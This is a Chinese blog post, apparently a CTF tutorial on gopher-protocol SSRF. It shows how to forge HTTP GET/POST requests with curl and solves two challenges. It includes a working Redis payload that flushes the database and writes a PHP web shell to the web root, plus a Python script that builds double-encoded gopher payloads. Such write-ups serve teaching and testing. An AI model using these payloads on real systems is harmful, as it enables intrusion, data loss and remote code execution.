Gopher协议与ssrf

最新推荐文章于 2024-06-04 15:27:39 发布
最新推荐文章于 2024-06-04 15:27:39 发布
阅读量4.6k 收藏 8
点赞数 5
分类专栏: # 协议分析
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/116272541
版权

文章目录

0x01 reference和环境准备

参考 Gopher协议在SSRF漏洞中的深入研究(附视频讲解)
参考 Gopher协议与redis未授权访问

Gopher协议格式:

URL:gopher://<host>:<port>/<gopher-path>_后接TCP数据流
  • gopher的默认端口是70
  • 如果发起post请求,回车换行需要使用%0d%0a,如果多个参数,参数之间的&也需要进行URL编码

注意%0d%0a是\r\n的URL编码。

遇到问题:win10自带的curl不支持gopher协议
在这里插入图片描述
网上下了一个,链接放在下面

将bin目录下三个文件放在C:\Windows\System32目录下,就不用添加环境变量了,替换原来的curl.exe。当然也可以放在其他地方不过要自己添加环境变量。
在这里插入图片描述

删除原来的curl.exe的方法:https://zhidao.baidu.com/question/1384229736645191820.html

0x02 使用gopher构造GET、POST请求

nc启动监听,监听6666端口:

nc -lvp 6666

使用curl发送http请求,命令为

curl gopher://121.196.196.190:6666/abcd

此时nc收到的消息为:bcd
在这里插入图片描述
可以发现url中的a没有被nc接受到,如果命令变为

curl gopher://121.196.196.190:6666/_abcd

此时nc收到的消息为:abcd

所以需要在使用gopher协议时在url后加入一个字符(该字符可随意写)

构造GET请求

那么如何发送HTTP的请求呢?例如GET请求。此时我们联想到,直接发送一个原始的HTTP包不就可以吗?在gopher协议中发送HTTP的数据,需要以下三步:

1、问号(?)需要转码为URL编码,也就是%3f

2、回车换行要变为%0d%0a,但如果直接用工具转,可能只会有%0a

3、在HTTP包的最后要加%0d%0a,代表消息结束(具体可研究HTTP包结束)

4.、gopher协议后的IP一定要接端口

服务器上的代码

<?php
    echo "Hello ".$_REQUEST["name"]."\n"
?>

一个GET型的HTTP包,如下:

GET /hello.php?name=Margin HTTP/1.1
Host: 121.196.196.190

URL编码并将%0A替换为%0d%0A、问号?替换为%3f、结尾加上%0d%0A

curl gopher://121.196.196.190:80/_GET%20/hello.php%3fname=Margin%20HTTP/1.1%0d%0AHost:%20121.196.196.190%0d%0A

发送成功

在这里插入图片描述

构造POST请求:

POST与GET传参的区别:它有4个参数为必要参数

需要传递Content-Type,Content-Length,host,post的参数,且Content-Length的长度必须正确

POST /hello.php HTTP/1.1
Host: 121.196.196.190
Content-Type:application/x-www-form-urlencoded
Content-Length:13

name=qaq

现在我们将它进行URL编码:

POST%20/hello.php%20HTTP/1.1%0AHost:%20121.196.196.190%0AContent-Type:application/x-www-form-urlencoded%0AContent-Length:13%0A%0Aname=qaq

将%0A替换为%0d%0A、问号?替换为%3f、结尾加上%0d%0A

curl gopher://121.196.196.190:80/_POST%20/hello.php%20HTTP/1.1%0d%0AHost:%20121.196.196.190%0d%0AContent-Type:application/x-www-form-urlencoded%0d%0AContent-Length:13%0d%0A%0d%0Aname=qaq%0d%0a

成功
在这里插入图片描述

0x03 CTF实战

[GKCTF2020]EZ三剑客-EzWeb

源码发现提示,得到内网地址
在这里插入图片描述

输入www.baidu.com回显百度页面,判断存在ssrf
在这里插入图片描述使用file: /var/www/html/index.php能读取到源码

<?php
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['submit'])){
		$url = $_GET['url'];
		//echo $url."\n";
		if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
		{
			//var_dump($match);
			die('别这样');
		}
		curl($url);
}
if(isset($_GET['secret'])){
	system('ifconfig');
}
?>

过滤了file协议、dict协议、127.0.0.1和localhost,还可以使用http、gopher
我们使用http协议进行内网主机存活探测。

使用burp进行c段扫描
在这里插入图片描述
发现目标
在这里插入图片描述
接下来使用Gopherus生成打redis payload

在这里插入图片描述

修改一下url,输入框中输入payload

gopher://10.0.158.11:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

在这里插入图片描述

然后访问shell.php得到flag
在这里插入图片描述

ctfhub POST请求

这道题需要用gopher协议构造一个post包,参数为key
在这里插入图片描述

http访问flag.php得到key的值为5805170ffc11f479662274d624b462d1
在这里插入图片描述

构造的包如下

gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type:application/x-www-form-urlencoded
Content-Length:36

key=5805170ffc11f479662274d624b462d1

将其url编码

gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0AHost:%20127.0.0.1%0AContent-Type:application/x-www-form-urlencoded%0AContent-Length:36%0A%0Akey=5805170ffc11f479662274d624b462d1

根据要求将%0A替换为%0d%0A、问号?替换为%3f、结尾加上%0d%0A

gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0aContent-Type:application/x-www-form-urlencoded%0d%0aContent-Length:36%0d%0a%0d%0akey=5805170ffc11f479662274d624b462d1%0d%0a

这里需要进行两次编码,因为这里GET会进行一次解码,curl也会再进行一次解码

gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250d%250aHost:%2520127.0.0.1%250d%250aContent-Type:application/x-www-form-urlencoded%250d%250aContent-Length:36%250d%250a%250d%250akey=5805170ffc11f479662274d624b462d1%250d%250a

然后发送它,拿到flag
在这里插入图片描述

写了个脚本自动完成上述步骤,这道题把payload里的key修改一下就可以

import urllib.parse

# 输入要构造的post请求包
payload = '''   
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type:application/x-www-form-urlencoded
Content-Length:36

key=601af1680224be3db87254533bd90ab9
'''
# 自动修改Content-Length长度
Content_Length = len(payload.split()[-1])   # 取得Content-Length
payload = payload.replace("36", str(Content_Length))    # 替换Content-Length
# 输入内网ip与端口
payload = "gopher://127.0.0.1:80/_" + payload.strip()

# url编码,python3.0后的编码器 urlencode更新后改为quote_plus
payload = urllib.parse.quote(str(payload))
# 替换
payload = payload.replace("%3A", ":").replace("%0A", "%0d%0a").replace("%3D", "=") + "%0d%0a"
print("[+] 1次url编码\n", payload)
payload = urllib.parse.quote(payload).replace("%3A", ":").replace("%0A", "%0d%0a").replace("%3D", "=")
print("[+] 2次url编码\n", payload)

结果:

[+] 1次url编码:
 gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0aContent-Type:application/x-www-form-urlencoded%0d%0aContent-Length:36%0d%0a%0d%0akey=601af1680224be3db87254533bd90ab9%0d%0a
[+] 2次url编码:
 gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250d%250aHost:%2520127.0.0.1%250d%250aContent-Type:application/x-www-form-urlencoded%250d%250aContent-Length:36%250d%250a%250d%250akey=601af1680224be3db87254533bd90ab9%250d%250a

在这里插入图片描述

天问_Herbert555
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
SSRF利用协议中的万金油——Gopher
qq_50854662的博客
02-23 2605
SSRF利用协议中的万金油——Gopher
ssrf漏洞中的url编码解码
qq_42303523的博客
04-06 1289
http协议gopher协议的编码解码过程 http协议 当我们输入“http://ip:host/xxx”时,浏览器会向ip:host发送http请求。如果“xxx”中含有“%xx”格式的内容,http协议会原封不动地发送给接收方,接收方在提取出参数之后再将参数中的“%xx”解码。 举例来说,如果我们访问“http://127.0.0.1/index.php?a=%26&b=123”,服务器接受到的报文中含有字符串“?a=%26&b=123”,然后服务器提取出参数a是“%26”,参数b是
SSRF服务端请求伪造
最新发布
wbplife的博客
06-04 270
显示响应(basic):它显示对攻击者的响应,因此在服务器获取攻击者要求请求的URL后,他将会把响应发送回攻击者。是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况况下SSRF攻击的目标是从外网无法访问到的内部系统。由于Gopher协议的特殊格式,在SSRF利用Gopher攻击目标时,需要对数据包进行两次URL编码。gopher:// --互联网上使用的分布型的文件搜集获取网络协议,出现在http协议之前。dict:// --字典服务器协议,dict是基于查询相应的TCP协议
关于gopher协议ssrf攻击
qq_69775412的博客
04-26 3087
Gopher协议浅析 Gopher协议是internet的一个信息查找系统,俗称万能协议,可以通过gopher访问对应计算机上的其他资源,例如利用gopher实现:GET请求,POST请求,内网的redis,mysql(以及各类关系型数据库)未授权访问,以及MongoDB,Memcache等。 协议详情 端口 默认为70端口,可以自定义 协议格式 gopher://127.0.0.1:70/_[data] “
WEB攻防-SSRF服务端请求&Gopher协议&无回显利用&黑白盒挖掘&业务功能点
siu~
09-18 1666
1、SSRF-原理-外部资源加载 2、SSRF-利用-伪协议&无回显 3、SSRF-挖掘-业务功能&URL参数
CTF gopher协议
a3320315的博客
11-03 7284
0x01 例题 这儿举例安恒的一道月题 tips:利用ssrf,gopher打内网 0x02 贴出代码 <?php highlight_file(__FILE__); $x = $_GET['x']; $pos = strpos($x,"php"); if($pos){ exit("denied"); } $ch = curl_init(); curl_setopt($ch,...
渗透系列:【防守方基础】危险报文识别+Gopher协议SSRF漏洞中的深入研究(附视频讲解)
01-08
渗透系列:【防守方基础】危险报文识别+Gopher协议SSRF漏洞中的深入研究(附视频讲解)
Gopher协议使用总结1
08-03
Gopher协议使用总结】 Gopher协议是一种早期的互联网通信协议,主要被用于文档的检索和分布。在HTTP出现之前,Gopher协议是Internet上重要的信息获取工具,它由明尼苏达大学的Anklesaria命名,其名称来源于大学的...
flask-gopher:Flask扩展,支持Gopher协议
02-05
扩展以支持协议。 内容 演示版 在以下URL的gopherspace中提供了Flask-Gopher服务器的实时演示: gopher://mozz.us:7005 关于 什么是地鼠? Gopher是万维网的替代方案,后者在90年代初达到顶峰。 狂热者仍然维护...
064-Gopher协议使用总结.pdf
09-20
用于向Gopher搜索引擎提交搜索数据,并且与之间用%09隔开。 Gopher客户端通过将Gopher字符串发送到Gopher服务器来指定要检索的项目。 转换规则: 我们可以先随意构造一个简单的PHP代码: $b=$_REQUEST["a"] ...
GopherServer-master_C#_Gopher_
09-29
GopherServer-master 是一个使用C#编程语言实现的Gopher协议服务器项目。Gopher是一种早期的互联网信息检索协议,它在TCP/IP协议栈上运行,主要用于提供文本菜单驱动的信息服务。Gopher协议在Web出现之前非常流行,...
SSRF - ctfhub - 1【内网访问、伪协议读取、端口扫描、POST详解、上传文件】
bin789456的博客
11-18 2247
写在前面 ssrf无论是生活中还是比赛中都是一种非常常见的漏洞。但一般来说单独考察的较少。后面将从ctfhub和其他平台上来慢慢练习。 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限
CTF SSRF redis写入shell、计划任务
03-07 1039
CTF SSRF redis写入shell、计划任务
gopher协议ssrf
UserNick157的博客
08-24 1173
gopher curl ssrf
php禁用gopher协议,SSRF攻击-运用gopher协议构造POST包--emmmm(http://10.112.68.215:10004/index.php?action=login)...
weixin_42629522的博客
03-18 348
还是天枢的一道CTF题,启程!分析题目,自己注册账户并登陆后,提示输入一个url,网站会自己运行查找网页信息。 emmmmm,很挑衅,网站就当作服务器,我们在url框中输入一个伪造的执行代码,让他运行获取到机密信息,哼哼。这就是SSRF(服务端请求伪造),伪造的代码留给服务端自己执行并返回我们需要的机密信息。在里面乱输入了一些东西,没有任何反馈。此时,我们就要扫描网站啊。1.扫描网站+分析rob...
ssrf中gopher协议的利用
V
10-29 5602
SSRF漏洞如何产生 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击 者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是 能够直接对目标网站的内部系统发起请求。(因为他是从内部系统访 问的,所以可以通过它攻击外网无法访问的内部系统,也就是把目标 网站当中间人) gopher协议的利用 gopher 协议 Gopher是Internet...
SSRF漏洞-Gopher协议扩展利用
小刚的博客
08-20 2340
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 Gopher协议扩展利用Gopher协议利用要点利用方式小案例ssrf利用redis写入webshell Gopher协议 Gopher在HTTP协议前是非常有名的信息查找系统,但是很老了,很少服务会用到它 但是!在SSRF漏洞中,它大方光彩,让SSRF漏洞利用更加广泛 利用此协议可以对ftp,memchahe,mysql,telnet,redis,等服务进行攻击, 并可以构造发送GET,POST.
curl和gopher协议ssrf的利用)
Z_Grant的博客
11-05 7213
文章目录一、基础知识的学习(1) cURL(2) PHP的curl函数(3) gopher协议3.1 用gopher协议get传数据3.2 用gopher协议post传数据3.3 在ssrf中使用gopher协议(4) file协议和dict协议 一、基础知识的学习 (1) cURL cURL是一个利用URL语法在命令行下工作的文件传输工具。它支持文件上传和下载,所以是综合传输工具。cURL还包...
curl开发遇到协议不支持问题排查
weixin_30530939的博客
09-28 353
1、本来想要开发一个邮件发送接口,按照官网例子写下代码,编译后出现如下问题: 2、curl是从官网下载的最新版本安装的,安装时也选择了 --enable-smtp,编译指定了库路劲 3、查看指定安装的新curl如下: 4、看起来一切正常,但是就是把上面的错误,后面看到官网上大神回复使用如下命令查看: 新安装的curl指向的Lib库是新版本的,没有问题,但是自...
2021gkctf checkin
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值